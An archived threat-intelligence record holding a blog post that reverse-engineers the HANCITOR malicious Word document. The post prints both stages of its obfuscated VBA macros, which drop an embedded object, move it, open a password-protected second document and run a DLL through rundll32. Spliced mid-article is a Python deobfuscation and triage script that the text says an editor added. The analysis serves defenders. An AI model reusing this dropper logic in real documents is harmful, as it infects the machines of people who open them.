{
	"id": "9f50c771-6cfb-43a4-8b92-f866d46d4b5c",
	"created_at": "2026-04-06T00:14:46.43843Z",
	"updated_at": "2026-04-10T03:24:24.503798Z",
	"deleted_at": null,
	"sha1_hash": "9f63df8e741ae08eb0f311987e4a53104ed2bbdf",
	"title": "HANCITOR: Analysing The Malicious Document | 0ffset Training Solutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 872708,
	"plain_text": "HANCITOR: Analysing The Malicious Document | 0ffset Training\r\nSolutions\r\nBy Chuong Dong\r\nPublished: 2021-11-23 · Archived: 2026-04-05 21:48:00 UTC\r\nHANCITOR (aka CHANITOR) is a prevalent malware loader that spreads through social engineering in the form\r\nof Word or DocuSign® documents. The infected document includes instructions for the victim to manually allow\r\nthe malicious macro code to be executed. The HANCITOR executable payload dropped by the macro code is used\r\nto download other malware on the victim machines such as FickerStealer, Cuba ransomware, Zeppelin\r\nransomware, and Cobalt Strike beacons.\r\nIn this post particularly, we will analyze the first two stages of a HANCITOR infection through Word documents.\r\nSimilar to other campaigns, the initial stage is delivered through malspam, and the final HANCITOR DLL\r\npayload is dropped and executed after the victim opens the document.\r\nTo follow along, you can grab the sample as well as the PCAP files for it on Malware-Traffic-Analysis.net.\r\nSHA256: 8733E81F7EF203F4D1C4208B75C6AB2548259CC35D68DF10EBF23A31E777871B\r\nStep 1: Dumping First Stage Macros\r\nUpon opening the document in Word, we can see an image directing us to click on the “Enable editing” and\r\n“Enable content” buttons with a security alert saying that macros have been disabled. This hints to us that this\r\ndocument contains some macro code that will be executed when we click to enable macro.\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 1 of 10\n\nWe can use olevba to quickly dump and analyze the document’s macro code. As shown below, the tool identifies\r\nthe Document_Open function with type AutoExec, which is executed if the victim presses the “Enable content”\r\nbutton. 
There are other suspicious commands to execute other files on the system, so we can analyze the VBA\r\ncode to examine its full functionality.\r\nBelow are the full VBA macros dumped from olevba.\r\nStage 1 Macro Code Dump\r\nStep 2: Analyzing First Stage Macros\r\nThe Document_Open function is a special function that gets executed when the document is opened, so it is\r\ndefinitely a good starting point for us to begin analyzing. The raw Document_Open function is documented\r\nbelow.\r\nPrivate Sub Document_Open()\r\n Dim dfgdgdg\r\n Call s1(\"Lo\")\r\n Dim fds, fdsa As String\r\n fds = \"\\\"\r\n fdsa = \".d\"\r\n Call s2(\"cal/\")\r\n Call ass\r\n Call acc\r\n Dim kytrewwf As String\r\n kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)\r\n If Dir(kytrewwf \u0026 fds \u0026 \"zoro\" \u0026 fdsa \u0026 vssfs) = \"\" Then\r\n Dim mySum\r\n mySum = Application.Run(\"bvxfcsd\")\r\n If Len(nccx) \u003e 2 Then\r\n Call nam(nccx, kytrewwf)\r\n Call pppx(kytrewwf \u0026 fds \u0026 \"zoro\" \u0026 fdsa \u0026 vssfs)\r\n End If\r\n End If\r\nEnd Sub\r\nMost of the variable declarations and function calls are simple obfuscation techniques: strings are broken into\r\nfragments (fds, fdsa, vssfs) and reassembled with the \u0026 operator at run time, so the complete strings cannot be\r\ndumped directly from the Word document. If we resolve these and replace the variables with their content (vssfs\r\nis set to \"oc\" elsewhere in the dump), the first IF statement becomes a check to see whether the “zoro.doc” file in the\r\nuser template path exists.\r\nIf Dir(kytrewwf \u0026 \"\\\" \u0026 \"zoro\" \u0026 \".d\" \u0026 \"oc\") = \"\" Then\r\nIf it does not exist, the macro calls the Application.Run method to execute the function bvxfcsd. 
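The resolution just done by hand can be automated. The Python script below is an added example written for this page, not code from the original post and not an olevba feature: it collects every name = literal assignment from dumped VBA, folds chains joined with & back into single literals while leaving names it cannot resolve (values that only exist at run time, such as the templates path) symbolic, and then matches a short list of indicators against the folded text. The sample input is re-typed from the macro fragments quoted on this page, from the first stage and from the second stage document analysed later; the vssfs = oc assignment is reconstructed from the resolved Dir() line above rather than copied from the dump, Document_Open_stage2 is a label chosen here for the second document's Document_Open, and the indicator list is the editor's, not the author's.

```python
import re

# DQ, BS and NL are spelled out with chr() so this block contains no literal double quote or backslash.
DQ = chr(34)   # double quote
BS = chr(92)   # backslash
NL = chr(10)   # newline

# Constructed test input, re-typed from the macro fragments quoted in this post (stage 1 Document_Open,
# bvxfcsd, nam, pppx, and the stage 2 Document_Open, labelled Document_Open_stage2 here only to keep names
# unique). vssfs = "oc" is reconstructed from the author's resolution; the real dump sets it elsewhere.
SAMPLE_VBA = NL.join([
    'Private Sub Document_Open()',
    ' fds = ' + DQ + BS + DQ,
    ' fdsa = ' + DQ + '.d' + DQ,
    ' vssfs = ' + DQ + 'oc' + DQ,
    ' kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)',
    ' If Dir(kytrewwf & fds & ' + DQ + 'zoro' + DQ + ' & fdsa & vssfs) = ' + DQ + DQ + ' Then',
    ' Call pppx(kytrewwf & fds & ' + DQ + 'zoro' + DQ + ' & fdsa & vssfs)',
    ' End If',
    'End Sub',
    'Sub bvxfcsd()',
    ' Selection.MoveDown Unit:=wdLine, Count:=3',
    ' Selection.TypeBackspace',
    ' Selection.Copy',
    'End Sub',
    'Sub nam(zoro_kl_file_path As String, user_template_path As String)',
    ' oxl = ' + DQ + BS + 'zoro.doc' + DQ,
    ' Name zoro_kl_file_path As user_template_path & oxl',
    'End Sub',
    'Sub pppx(pili As String)',
    ' Documents.Open FileName:=pili, PasswordDocument:=' + DQ + 'doyouknowthatthegodsofdeathonlyeatapples?' + DQ,
    'End Sub',
    'Private Sub Document_Open_stage2()',
    ' Shell (' + DQ + 'rundl' + DQ + ' & ' + DQ + 'l32.exe' + DQ + ' & ' + DQ + ' ' + DQ + ' & vcbc & '
    + DQ + BS + 'gelforr.dap' + DQ + ' & ' + DQ + ',BNJAFSRSQIX' + DQ + ')',
    'End Sub',
])

IDENT = '[A-Za-z_][A-Za-z0-9_]*'
STRLIT = DQ + '(?:[^' + DQ + ']|' + DQ + DQ + ')*' + DQ       # VBA literal; a doubled quote is one quote
TOKEN = '(?:' + STRLIT + '|' + IDENT + ')'
ASSIGN_RE = re.compile('^[ ]*(' + IDENT + ')[ ]*=[ ]*(' + STRLIT + ')[ ]*$')   # name = "literal"
CHAIN_RE = re.compile(TOKEN + '(?:[ ]*&[ ]*' + TOKEN + ')+')                   # a & "b" & c ...

def unquote(lit):
    return lit[1:-1].replace(DQ + DQ, DQ)

def quote(text):
    return DQ + text.replace(DQ, DQ + DQ) + DQ

def collect_constants(vba):
    # Every name = "literal" line in the module, ignoring scope and reassignment: a triage aid, not an emulator.
    consts = {}
    for line in vba.split(NL):
        m = ASSIGN_RE.match(line)
        if m:
            consts[m.group(1)] = unquote(m.group(2))
    return consts

def fold_chain(chain, consts):
    # Substitute known names, merge neighbouring literals, keep unknown names (run-time values) symbolic.
    out = []
    for tok in re.findall(TOKEN, chain):
        if tok.startswith(DQ):
            value = unquote(tok)
        elif tok in consts:
            value = consts[tok]
        else:
            out.append(tok)
            continue
        if out and out[-1].startswith(DQ):
            out[-1] = quote(unquote(out[-1]) + value)
        else:
            out.append(quote(value))
    return ' & '.join(out)

def fold_strings(vba):
    consts = collect_constants(vba)
    return NL.join(CHAIN_RE.sub(lambda m: fold_chain(m.group(0), consts), line)
                   for line in vba.split(NL))

# Indicators of the drop-rename-open-execute pattern seen in both stages (editor's list, not olevba's).
INDICATORS = [
    ('auto-exec entry point', 'Sub Document_Open'),
    ('user template path used as drop location', 'wdUserTemplatesPath'),
    ('embedded object copied out, Word writes it to Temp', 'Selection[.]Copy'),
    ('dropped file renamed and moved', '^[ ]*Name[ ]+' + IDENT + '[ ]+As[ ]+.*$'),
    ('second document opened with a password', 'PasswordDocument:=' + STRLIT),
    ('rundll32 launch, visible only after folding', 'Shell[ ]*[(].*rundll32[.]exe.*[)]'),
]

def triage(vba):
    # Fold first, then match: in the raw macro the string rundll32.exe never appears in one piece.
    folded = fold_strings(vba)
    report = {}
    for label, pattern in INDICATORS:
        m = re.search(pattern, folded, re.MULTILINE)
        if m:
            report[label] = m.group(0).strip()
    return folded, report

if __name__ == '__main__':
    print(triage(SAMPLE_VBA)[0])
```

Running it shows the Dir() check and the Name statement with the assembled zoro.doc path, and the stage 2 Shell call assembled as rundll32.exe followed by the template path, gelforr.dap and the export name, which is why a scanner that greps the raw macro text for rundll32.exe misses it. The folder ignores VBA scoping and reassignment, so treat its output as a reading aid rather than an emulation. The cleaned-up bvxfcsd function that Application.Run invokes follows.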
Below is the\r\ncleaned up version of this function’s code.\r\nSub bvxfcsd()\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\n Selection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\n Selection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.TypeBackspace\r\n Selection.Copy\r\n \r\n Dim uuuuc\r\n uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)\r\n ntgs = 50\r\n sda = 49\r\n While sda \u003c 50\r\n ntgs = ntgs - 1\r\n If Dir(Left(uuuuc, ntgs) \u0026 \"Local/Temp\", vbDirectory) = \"\" Then\r\n Else\r\n sda = 61\r\n End If\r\n Wend\r\n Call ThisDocument.hdhdd(Left(uuuuc, ntgs) \u0026 \"Local/Temp\")\r\nEnd Sub\r\nThe first thing we see is a set of calls executing methods from the Selection property. Since the cursor points to\r\nthe beginning of the document initially, these calls move it down 3 lines, right 2 characters, down 3 lines, right 2\r\ncharacters, and delete one character at the cursor.\r\nThis block of code might seem harmless, but it is an effective way to drop a VBA object into the file\r\nsystem without the macro itself ever writing a file. If we move the cursor according to the steps above, we see that the cursor stops at a visible but small\r\nblack box that was not there initially.\r\nThis black box represents a VBA object embedded in the document, and once the victim or the VBA\r\nmacro interacts with it, Word writes the object out to the file system. Copying the object is one such\r\ninteraction, and that is exactly what the macro does when it calls Selection.Copy.\r\nMicrosoft documents here that embedded Word Objects are stored as temporary files in the Temp directory for the\r\ndocument to interact with if needed. 
Therefore, we know that this object, whatever it is, is dropped somewhere in\r\nthe victim’s Temp directory.\r\nWe can go further and examine the object’s properties to find its exact path.\r\nAs shown, the object is dropped to the file zoro.kl in the folder {90224AF4-616C-4FE4-9467-D6BA4B34E24E}\r\ninside the Temp directory of my analysis VM. This is in fact the second stage Word document that is later\r\nlaunched in the code, but we will keep analyzing the VBA macros to see how the code interacts with it.\r\nAfter dropping this file, the While loop derives a valid Local\\Temp path from the user templates path: Left(uuuuc, ntgs)\r\nshortens that path one character at a time, starting from 49 characters, until appending Local/Temp names an existing\r\ndirectory, which turns ...\\AppData\\Roaming\\Microsoft\\Templates into ...\\AppData\\Local/Temp (the loop silently assumes\r\nthat this prefix is shorter than 50 characters). The function then calls hdhdd with the Temp directory path as\r\nparameter. Below is the content of that function.\r\nSub hdhdd(asda As String)\r\n Dim MyFSO As FileSystemObject\r\n Dim MyFile As File\r\n Dim SourceFolder As String\r\n Dim DestinationFolder As String\r\n Dim MyFolder As Folder\r\n Dim MySubFolder As Folder\r\n Set MyFSO = New Scripting.FileSystemObject\r\n Call Search(MyFSO.GetFolder(asda), nccx)\r\nEnd Sub\r\nThis function just retrieves the folder object for the path passed as its parameter, the Temp path, and\r\ncalls the Search function. 
Below is the cleaned up version of the function’s content (the error handler that the ErrHandle label\r\nbelongs to is restored, and the recursion passes the output parameter through).\r\nSub Search(in_dirpath As Object, out_string As String)\r\n On Error GoTo ErrHandle\r\n Dim subfolder As Object\r\n Dim fileobject As Object\r\n For Each subfolder In in_dirpath.SubFolders\r\n Search subfolder, out_string\r\n Next subfolder\r\n For Each fileobject In in_dirpath.Files\r\n If fileobject.Name = \"zoro.kl\" Then\r\n out_string = fileobject\r\n End If\r\n Next fileobject\r\n Exit Sub\r\nErrHandle:\r\n Err.Clear\r\nEnd Sub\r\nThe first loop of this function iterates through all subfolders in the Temp path. For each of those subfolders, the\r\nfunction recursively calls itself to search in that subfolder. At the base case of the recursion, where there are no\r\nmore subfolders in the current folder, the code iterates through all file objects and checks whether the name is zoro.kl.\r\nOnce found, the code assigns the file object to the second parameter; since out_string is a String, VBA stores the\r\nobject’s default property, its full path. Because the parameter is passed by reference, this Search call ultimately\r\nsets the global variable nccx to the path of the zoro.kl file dropped earlier.\r\nAfter this part, the code picks up back in the Document_Open function, where the final IF statement checks if the\r\nlength of nccx (the zoro.kl file path) is longer than 2. It then calls the function nam, passing the file path and the\r\nuser template path respectively. 
Below is the cleaned up version of this function.\r\nSub nam(zoro_kl_file_path As String, user_template_path As String)\r\n Dim oxl\r\n oxl = \"\\zoro.doc\"\r\n Name zoro_kl_file_path As user_template_path \u0026 oxl\r\nEnd Sub\r\nThis function executes the VBA Name statement to rename the zoro.kl file in the Temp folder to zoro.doc and\r\nmove it to the user template folder (Name can move a file to another directory, which is why the destination\r\nis a full path).\r\nThe final call in Document_Open is to the function pppx with the full path to the zoro.doc file as parameter.\r\nBelow is the content of that function.\r\nSub pppx(pili As String)\r\n Documents.Open FileName:=pili, ConfirmConversions:=False, ReadOnly:= _\r\n False, AddToRecentFiles:=False, PasswordDocument:=\"doyouknowthatthegodsofdeathonlyeatapples?\", _\r\n PasswordTemplate:=\"\", Revert:=False, WritePasswordDocument:=\"\", _\r\n WritePasswordTemplate:=\"\", Format:=wdOpenFormatAuto, XMLTransform:=\"\"\r\nEnd Sub\r\nThis function executes the Documents.Open method to open the zoro.doc file. What is different about this newly\r\ndropped document is that it is password-protected: the macro supplies the password\r\n“doyouknowthatthegodsofdeathonlyeatapples?” through the PasswordDocument argument so that Word can open it\r\nand run the macro inside. The same encryption keeps the second stage out of reach of any scanner that does not\r\nknow the password.\r\nStep 3: Dumping Stage 2 Macros\r\nSimilar to the first stage, the second stage document contains some macro code that can be dumped by olevba.\r\nHowever, the default olevba command does not work for this document and throws an error that the document\r\ncannot be decrypted.\r\nSince the document is encrypted with the password we saw in the earlier stage, we must pass it with the olevba\r\n-p option so that the document is decrypted before its macro code is dumped (quote the password in an interactive\r\nshell, since ? is a glob character there).\r\nolevba zoro.doc -p doyouknowthatthegodsofdeathonlyeatapples?\r\nAs shown from the olevba result below, the document’s macros contain a Document_Open function with type\r\nAutoExec as well as the functionality to run an executable file.\r\nThe content 
of the macros is recorded below.\r\nStage 2 Macro Code Dump\r\nStep 4: Analyzing Stage 2 Macros\r\nAgain, we begin our analysis at the Document_Open function, as it is the entry point of the code.\r\nHere, we can see a similar code pattern to the code in the first stage. It first checks if the gelforr.dap file exists in\r\nthe user template path, and if it does not, the same methods from the Selection property are executed to drop the\r\ndocument’s VBA object into the Temp directory.\r\nPrivate Sub Document_Open()\r\n Dim vcbc As String\r\n vcbc = Options.DefaultFilePath(wdUserTemplatesPath)\r\n If Dir(vcbc \u0026 \"\\gelforr.dap\") = \"\" Then\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\n Selection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\n Selection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.TypeBackspace\r\n Selection.Copy\r\n Call bvxfcsd\r\n If Len(hdv) \u003e 2 Then\r\n Call nam(hdv)\r\n Shell (\"rundl\" \u0026 \"l32.exe\" \u0026 \" \" \u0026 vcbc \u0026 \"\\gelforr.dap\" \u0026 \",BNJAFSRSQIX\")\r\n ActiveDocument.Close\r\n End If\r\n End If\r\nEnd Sub\r\nNext, the function bvxfcsd is called. As seen below in the code’s cleaned-up version, this function is a copy of the\r\nfirst stage’s bvxfcsd minus the Selection calls, which now live in Document_Open, and both versions call the\r\nfunction hdhdd to search for the dropped VBA object in\r\nthe Temp directory. 
The only difference between these stages is the name of the object file being searched, with\r\nthe second stage’s document searching for the filename gelfor.dap (ewrwsdf evidently holds the Local/Temp suffix\r\nthat stage 1 spelled out inline).\r\nSub bvxfcsd()\r\n Dim uuuuc\r\n uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)\r\n ntgs = 50\r\n sda = 49\r\n While sda \u003c 50\r\n ntgs = ntgs - 1\r\n If Dir(Left(uuuuc, ntgs) \u0026 \"Local/Temp\", vbDirectory) = \"\" Then\r\n Else\r\n sda = 61\r\n End If\r\n Wend\r\n Call ThisDocument.hdhdd(Left(uuuuc, ntgs) \u0026 ewrwsdf)\r\nEnd Sub\r\nOnce found, the path to the gelfor.dap file is written to the hdv variable, which is then passed to the function nam\r\nas parameter. Similar to the nam function in the first stage, this function renames the gelfor.dap file in the Temp\r\npath to gelforr.dap and moves it to the user template folder (pls holds the user template path).\r\nSub nam(pafs As String)\r\n Name pafs As pls \u0026 \"\\gelforr.dap\"\r\nEnd Sub\r\nFinally, the code calls the Shell VBA function to execute the following command (note that the string fragments\r\nconcatenate with no space after the comma):\r\nrundll32.exe \u003cuser template path\u003e\\gelforr.dap,BNJAFSRSQIX\r\nFrom this, we know that the dropped VBA object is a DLL file, and the second stage’s document executes its\r\nexported function BNJAFSRSQIX using rundll32.exe, which takes the DLL path and the export name separated by a\r\ncomma. The ActiveDocument.Close call that follows closes the second stage document once the DLL is running.\r\nThe dropped DLL is the final HANCITOR payload that is used to download a Cobalt Strike beacon, and we will\r\nbe analyzing HANCITOR functionalities using this sample in the next blog post!\r\nIf you have any questions regarding the analysis, feel free to reach out to me via Twitter.\r\nSource: https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/"
	],
	"report_names": [
		"hancitor-maldoc-analysis"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434486,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f63df8e741ae08eb0f311987e4a53104ed2bbdf.pdf",
		"text": "https://archive.orkl.eu/9f63df8e741ae08eb0f311987e4a53104ed2bbdf.txt",
		"img": "https://archive.orkl.eu/9f63df8e741ae08eb0f311987e4a53104ed2bbdf.jpg"
	}
}